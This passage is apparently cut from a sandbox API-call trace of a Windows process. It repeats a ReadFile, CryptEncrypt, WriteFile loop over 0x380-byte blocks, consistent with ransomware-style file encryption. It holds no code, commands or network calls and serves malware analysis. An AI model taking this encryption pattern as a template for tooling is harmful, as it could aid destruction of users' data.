pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.003] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.003] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.003] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.003] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.003] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.003] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.003] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.003] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.003] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.003] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.004] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.004] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.004] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.004] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.004] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.004] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.004] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.004] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.004] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.004] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.004] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.005] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.005] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.005] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.005] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.005] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.005] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.005] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.005] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.005] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.005] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.006] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.006] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.006] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.006] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.006] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.006] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.006] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.006] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.006] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.006] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.006] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.006] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.007] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.007] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.007] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.007] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.007] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.007] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.007] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.007] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.007] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.007] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.007] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.008] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.008] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.008] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.008] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.008] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.008] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.008] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.008] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.008] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.008] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.008] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.009] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.009] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.009] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.009] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.009] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.009] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.009] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.009] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.009] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.009] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.009] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.010] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.010] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.010] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.010] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.010] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.010] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.010] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.010] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.010] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.010] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.011] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.011] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.011] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.011] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.011] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.011] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.011] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.011] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.011] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.011] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.011] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.012] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.012] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.012] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.012] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.012] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.012] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, 